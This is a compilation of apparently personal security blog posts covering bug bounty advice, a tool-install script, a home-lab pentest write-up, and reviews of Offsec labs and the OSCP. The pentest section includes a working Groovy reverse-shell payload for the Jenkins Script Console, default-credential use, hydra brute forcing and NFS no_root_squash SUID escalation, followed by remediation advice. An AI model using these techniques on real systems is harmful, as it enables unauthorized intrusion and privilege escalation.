Bug hunting seems to be all the rage these days. I can understand that, hacking is fun. So if you can hack (legally) and get paid, why not? Let me just tell you what you’re getting yourself into.
For one, you probably aren’t going to make much money, and even if you do make some money, you’d have probably made more with a part time job, or doing whatever needs to get done at your day job to move up in the organization and make more money.
Here are a few questions to ask yourself before you bug hunt.
Can you afford $20-$40 a month for a VPS? You’ll be doing A LOT of recon and you don’t want to do it from your home IP address. You’ll get IP bans, and it will really make your household angry if they can’t get on Netflix because you spent all night hammering Akamai or whatever the case may be.
Can you afford a $400 Burp Pro subscription? Yeah, you may be able to get away without it, but IMO it isn’t worth the effort – double so if you do/are planning to work in the security industry.
> Programs:
Now, you see all those programs listed for hacking on HackerOne and and BugCrowd? Well they are all public programs that have had thousands of people picking over their programs for YEARS at this point. That’s not to say some bugs aren’t still there, they are, but they are way, way less in numbers. Not to mention, many of them have had paid pentesters hacking on them. A lot of these programs were private before they went public too, so when you see the “launched” time, it actually isn’t true – the program didn’t just launch this month.
And don’t get me started on the unpaid bounty programs. They basically are getting all this work done without having to pay anybody. But hey, you’ll get points for hacking them!!!!! Oh wow, great. Unpaid programs should not exist. It lessens the value of our work.
Let me tell you a story of me and an unpaid program. About a year ago, I got invited to this program, and I immediately realized the scope was very large – which is awesome. Within a few days, I had found a bunch of bugs. All of these bugs were medium or higher, and one was EXTREMELY critical. So naturally, I’m happy, and I’m thinking I’m going to make some good money. Wrong. That’s when I found out that this program was unpaid.
I know, I know – it is my fault for not checking first. At the time, I was under the assumption that you had to be a paid program to be a private program. I don’t know where I got that from. My point remains valid. Basically, there is a good chance I saved this company millions of dollars, and without going into details, it could have been worse that just a monetary loss for them. You know what I got in return? Points. Great. Wow.
This actually happened to me again recently. Yes, I’m stupid. But I digress, haha.
> Coding:
I see a lot of posts asking if you need to know how to code to bug hunt. It sounds like a lot of these people are trying to get away without learning how to code. Let me help you.
YOU NEED TO KNOW HOW TO CODE.
You don’t have to be a pro, but you need to be decently fluent in python and bash, and at the very least, be able to read PHP and Javascript. The more experienced you are the better.
You see those people making a lot of money bug hunting? They are probably good coders. They’ve probably automated all their recon with Python or Bash scripts. They can decompile mobile and web apps. They’re pretty good coders, generally.
> Certs:
Let’s talk about the OSCP. Is it a cool cert? Yes. Does it teach you much about bug hunting? Yes and no. You’ll need to add a lot more techniques and tools to your arsenal to be successful. The offsec AWAE does have some topics that are useful to bug hunting – web apps in particular.
Let’s talk about these techniques and tools.
You’ll need to install a lot of tools you’ve never heard of. And listen, everybody has a massive amount of bug hunting scripted. They are constantly scanning ALL the hosts in EVERY program for low hanging fruit. Again, that doesn’t mean you won’t find anything, but it greatly reduces your chances.
You still wanna bug hunt? Go for it. But don’t get discouraged when you’re in the hole $600 bucks and you’ve found two self XSS vulns after a year. Lol
> TLDR:
Don’t bug hunt, and if you do, avoid unpaid programs. Better yet, spend your time advancing your career or getting a part time job. Also, use my Linode link for your VPS 😉
For one, it’ll keep your IP address from being banned by certain providers. How would it feel to wake up one day and not being able to access certain sites because your IP has been blacklisted? If you use a VPS, this isn’t much of an issue. You can just change out the IP from the VPS provider. It may be a littler harder to change your home IP address.
For two, it makes tool installation easier and faster. On Linode, I have a lengthy script that I run when I’m starting up a new box. The script sets up everything I need for bug bounty hunting. It makes tearing down a box and bringing it up a new one simple and quick.
Another reason you may want a cloud-based box running is for server capabilities. For example if you’re testing out some sort of XSS/XXE/etc. and you need a server to host a payload, your bug bounty box can serve double duty. Additionally, some hunters maintain giant databases of scraped webpages, nmap scans, targets and their subdomains, and on and on and on. But perhaps my favorite usage of a dedicated bug-bounty box is hosting your own semi-permanent Burp Collaborator server as described here.
I use this in my day-to-day exploitation because I don’t want to host this stuff at home, which exposes my personal IP address and whatever ports I have open to the general public, which I try to avoid.
Here is a small example of a script that I run. My script is significantly larger, but this is a decent start.
#!/bin/bash
# for use with Ubuntu 20.04
# some security tools to get started
# use this to setup new bug bounty box
# use at your own risk
# check if running as root
if [ "$EUID" -ne 0 ]
then echo "Run as root, please!"
exit
fi
mkdir sectools
cd sectools
apt update -y && apt upgrade -y
# install some packages and tools that are used regularly
apt install \
apt-transport-https \
ca-certificates \
curl \
gnupg-agent \
software-properties-common \
net-tools \
nmap \
john \
hashcat \
python3-pip \
wfuzz \
nikto \
gobuster \
masscan \
ruby-full \
ruby-railties \
wireguard \
nfs-common \
hydra \
cewl \
mlocate
# evil winrm
gem install evil-winrm
# powershell
snap install powershell --classic
# amass
curl -s https://api.github.com/repos/OWASP/Amass/releases/latest | grep "browser_download_url.*linux_amd64.zip" | cut -d : -f 2,3 | tr -d \" | wget -i -
unzip amass*
chmod +x ./amass_linux_amd64/amass
mv ./amass_linux_amd64/amass /usr/bin/
# nuclei
curl -s https://api.github.com/repos/projectdiscovery/nuclei/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
tar xzf nuclei* nuclei
chmod +x nuclei
mv nuclei /usr/bin/
# httpx
curl -s https://api.github.com/repos/projectdiscovery/httpx/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
tar xzf httpx* httpx
chmod +x httpx
mv httpx /usr/bin/
# subfinder
curl -s https://api.github.com/repos/projectdiscovery/subfinder/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
tar xzf subfinder* subfinder
chmod +x subfinder
mv subfinder /usr/bin/
#aquatone setup
curl -s https://api.github.com/repos/michenriksen/aquatone/releases/latest | grep "browser_download_url.*linux_amd64-*" | cut -d : -f 2,3 | tr -d \" | wget -i -
unzip aquatone* aquatone
chmod +x aquatone && cp aquatone /usr/bin
# FFUF
curl -s https://api.github.com/repos/ffuf/ffuf/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
tar xzf ffuf* ffuf
chmod +x ffuf
mv ffuf /usr/bin/
# getallurls (gau)
curl -s https://api.github.com/repos/lc/gau/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
tar xzf gau* gau
chmod +x gau
mv gau /usr/bin
cd ..
echo "Don't forget to install metasploit, setoolkit, hexeditor, burp suite, wireshark, etc"
echo "all finished!"
You can add whatever you want to this script, and then spin up your bug bounty box with one script. I have my script set my hostname, bashrc, environment variables, download repos from git, install docker, install go, etc.
So who should you use for your VPS? I’ve used AWS, Azure, Digital Ocean, and Linode, and I find Linode to be the best. Just try them all out, and I think you’ll agree with me. AWS and Azure are both massive in size. Azure seems to take way to long to do certain tasks, so that is frustrating. The site just seems slow in general. AWS is better than Azure.
Linode is where it is at. It is quick. The interface is simpler and easier to use than all of the above, and it is cheaper than all of the above. Check it out using my referral link, if you’re interested. That link will give you a $100/60 day credit, so you don’t want to sign up without one. You can just try it out for free and see what you think.
So, I had to fake the initial access portion of this pentest. I only have one externally facing service open on my firewall, and it doesn’t allow logins, so I’m fairly secure in that regard. I also run an intrusion detection system on my LAN, so hopefully I’ll be made aware of any intrusions.
I have a Raspberry Pi 3 (RP3) on which I run Retropie to play old games. Let’s say I downloaded a malicious ROM that was actually a RAT, and now the attacker (me) has access to the RP3 as the pi user.
The first step in this attack would likely be to map the internal network with nmap. Unfortunately, nmap is not installed.
What do I do in this case? Well, I could use this bash script to do a rudimentary ping sweep of the network.
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
That gives us a list of IPs to work on for lateral movement. But what else can we do? Let’s try ARP:
That gives us mostly the same results, but if you look closely, there are a couple of devices that didn’t show up in the ping sweep. If we look closely at the hostnames, you’ll see a lot of IoT devices and not many “real” PCs.
But, as we already know, this is a RP running Retropie. Maybe there are default credentials for the Retropie, and we can use them to install stuff.
Looks like the default creds are pi:raspberry. And it looks like they will work for us. Let’s install nmap and truly map the network.
First we will do a simple nmap scan and skip port scanning.
This output is a little more clear than the ARP scan. We can see a couple of interesting hostnames – desktop1, parrot, and unifi. The first thing that comes to mind when I see parrot is ParrotOS, the pentesting operating system. And I’m assuming desktop1 is a desktop PC. We also have some IPs without hostnames, which we can investigate as needed.
Additionally, we see a bunch of IoT devices present, which we won’t spend time on now, but I’m planning an article in the future focusing on security issues associated with them.
> Lateral Movement
Let’s start with an nmap scan of parrot:
We have a couple of ports there that could come in handy, if we happen to find any usernames. This is a home network, so we likely can spray/brute force without being detected (except, I’d actually detect this on my LAN with my IDS). Make note of this scan and move on to nmap 186 desktop1:
That’s strange, it doesn’t seem like the desktop has many ports open. Now, how about unifi, 192.168.1.191. It turns out this is actually my desktop PC.
sudo nmap -A -p- 192.168.1.191 | tee nmap-desktop.txt
Turns out there was A LARGE NUMBER of open ports on my desktop, which was expected. I run some services on my desktop PC, which actually serves multiples roles around my home as a media server, general workstation, development server, VM/container host, etc. So let’s grep that file for open ports
Where to start? Well, the services that stick out the most to me are port 2049, which is probably an NFS share, all the 8XXX ports and 9080, which all seem to be webservers of some sort. I’m going to access these locally, but if this were real life, I’d have to setup proxychains/SSH/etc to use the RP as a pivot box. Let’s check the NFS share first.
showmount -e 192.168.1.191
Looks likes we have some shares there. Let’s mount them.
Jackpot! We have some very sensitive directories here – even a file named username.txt. We are going to avoid enumerating this data, but if this was a real pentest, you can be assured there are things to be found here. Let’s move on for now.
Sure enough, port 8443 is a Unifi login point. Port 8080 also redirects here.
We can explore this down the road, if needed, but let’s take a look at some more stuff. Ports 8880 and 8843 give me 400 error codes.
And port 9080 seems to be Jenkins, hmm.
One thing I know about Jenkins is that it will start up with a default username of admin, unless you change it. Maybe we can crack it with hydra? After all, it is a local and behind a firewall. Maybe the user (me) is lax on security on their local network. Good thing I’m administrator on the Raspberry Pi. Now, if we are going to brute force this password, we need get the details of the request.
With the information in those headers and body, we can create a hydra command to brute force the password, using this list:
And success! Maybe I should have tried the simple ones manually, first, but oh well. In a real pentest we may consider password spraying all the login pages and services that we can find.
Looks like there is one job present that we would explore in a real pentest. This may give us some info to move laterally on this network, or even other networks, if this is some sort of pipeline for an external site (which it actually is, https://nuke-api.com). For now, we can use the tried and true method of obtaining a reverse shell from the Jenkins Script Console:
String host="192.168.1.201";
int port=4444;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Then start the listener on the attacking box, hit ctrl-enter in Jenkins script console, and voila!
Now we have the user ‘user’ on the desktop PC.
> Privilege Escalation
First, we get ourselves a better shell.
Lets get rid of that command echoing:
You see those data folders? That’s interesting because those are the same ones we saw that were shared with NFS earlier. Let’s get some more information about them.
Uh, oh. I think we found a way to elevate our privileges. That ‘no_root_squash’ export option is a security concern. Basically, it allows remote users to mount the drive and do things as root.
So let us go back to the RP3.
We’ve mounted the drive again (disregard the obviously sensitive files and directories, we aren’t focusing on that aspect today).
From here we can do one of my favorite privilege escalations to obtain root on the desktop. Now, if the boxes were the same architecture, we could, on the RP3, copy /bin/bash to the mount and set the SUID bit. Unfortunately, that will not work in our case, so we will have to use our brains.
First, create this simple C program to elevate to root. Then, on the desktop, compile the program. Maybe we could have transferred the desktop’s bash binary to this directory, and then enable the SUID bit from the RP3, but I decided to do it another way.
gcc getroo.c -o getroot
Then, back on the RP3, run the following command to make the file executable and the SUID bit active.
We can see the file is now there with the SUID bit set, so we run it, and now we are root!
> Analysis and Remediation
Phew! Where to start? This pentest exploited a litany of security issues.
To start, if the initial access was obtained from the download of a malicious file, some antivirus may have helped. Better yet, train your users to not download strange files. After all, antivirus can be bypassed.
Next, let’s talk about default/basic credentials. We ran into this twice on this engagement – once on the RP3, which allowed us root privileges to install software to advance our attack, and then once again default credentials allowed us to log into Jenkins.
Once we got into Jenkins, we used built in functionality to get us access to the desktop box. This could have been remedied, or alleviated by disabling the Jenkins script console, or running Jenkins with a different user. We also could run Jenkins in a container (which is what I actually do, IRL). That way, the malicious actor would have to break out of the container in order to obtain direct access to the box. As long as the container is properly configured, it may be very difficult, or impossible to break out of.
Ultimately, the misconfiguration of NFS shares is what allowed us to root the desktop PC. The shares did not need to be shared with no_root_squash. This options allows a root user on another box to create files that will remained owned by the root user instead of being owned by a user named ‘nobody.’ This is a security feature that should almost never be bypassed.
That is all I got. Please don’t hack me.
Disclaimer: My network is not actually this insecure.
If you don’t already know, the Offsec Proving Grounds are a new laboratory created by Offsec to compliment their training courses. It’s basically a Hack the Box version of Vulnhub, and it explains why Offsec purchased Vulnhub recently.
I’ve been trying it out for a couple of months now, and I think it was a good move for Offsec, but it is lagging vs. the competition.
> Price
First off, for $20 a month, it is significantly more expensive than HTB’s standard VIP option, which is about $10. HTB also has more boxes, challenges, labs, etc. So Offsec is definitely behind, in this regard. With that said, Offsec has started paying people to submit boxes, so I see the number and quality of boxes available increasing soon. I know if I was to make a box, and I’ve toyed around with the idea, I’d probably submit it to Offsec before HTB, at this point.
> Site Design
Offsec’s website design is functional, but it isn’t as flashy as HTB. That may be a positive or negative, depending on your taste. At first I had some troubles getting machines to start properly, but that appears to be ironed out.
> Functionality
It seems you have to have your VPN connection going to start a machine, which is almost as annoying as the machines changing IP addresses each time they are restarted. Also, don’t log out and clear your cookies, that will make stuff go a bit haywire, though that may be cleared up by now. I think you should be able to add this to your .ovpn file to automatically log in
auth-user-pass /home/user/.ssh/login.conf
And then create login.conf in the same directory as the ovpn file. In login.conf, put your username on one line and password on the next line – that’s all. Two lines, first is username and the second is your password.
> Conclusion
I’d say the proving grounds are best for those people working towards an OSCP. They easy boxes on the site are actually easy in comparison to the newer HTB “easy” boxes. Offsec needs to work on updating the website to be a bit more modern, and add more features to increase the value. After all, why would somebody pay nearly double the price of HTB for less value? Also, please make it so I don’t have to enter my obscure VPN credentials every time I log in.
I took the OSCP (Offensive Security Certified Professional) some time ago, but recently enough. If you’re reading this, you probably know of the exam, but for those that don’t, here is a short explanation.
Basically, it’s a cybersecurity exam where you’re given access to a computer network containing five machines (computers). In the first 24 hours of the exam, your goal is to break into (or root, as we say) as many of these machines as possible. The second 24 hours is reserved for writing a report detailing the results of your penetration test. It’s supposed to mimic, in some fashion, a “real life” penetration test.
The test has a reputation of being really hard. It’s commonplace for people to not sleep much in the 48 hours they’re allotted to hack and write. And, after all, it isn’t an exam where you can just read a book, or memorize multiple choice questions – you actually have to know how to hack. Offensive Security, the company that runs the program, actually watches you the whole time via webcam.
With that said, I feel that the difficulty of the exam is overstated. That isn’t because I’m some sort of IT professional that has been doing this for 10 years professionally. I don’t work in IT, software engineering, or anything even tangentially related to computers. Nor do I have a degree in IT or Computer Science. I think people have issues with the exam for one main reason.
I think many people come into it it way unprepared. And this may seem obvious, since if they were prepared, they would have passed, but please stick with me. They signed up for the OSCP, rooted a dozen boxes in the lab that you’re given access to, did a bit of the exercises in the manual, and called it a day, thinking they knew what they were doing because they’ve been working in IT for a decade. Well, let me tell you, they can always throw some software or web app at you that you’ve never even seen before, which is what happens to me weekly on HTB. However, the methods of attack will all be the same. In fact, I’d say the exam boxes were EASIER than easy boxes on HTB – especially the newer easy boxes.
In my opinion, you need root >90% of the lab machines, and then be active on HTB for a few months to be fully prepared for this exam. You need to make box enumeration and privilege escalation second nature. You need to have notes, too. They can be very helpful. You need to be able to rip out a custom buffer overflow exploit in python in less than an hour. You need to LEARN HOW TO GOOGLE. If you do this you’ll be golden.
I went in expecting Cyber World War 3, and was laughing and confused after about 5 hours when I had enough points to pass.
And then, once you pass, you can start in on something harder – the Advanced Web Attacks and Exploitation course to get the Offensive Security Web Expert certification also created by Offensive Security. That one is a 48 hours online exam followed by 24 hours to write a report, and supposedly much harder.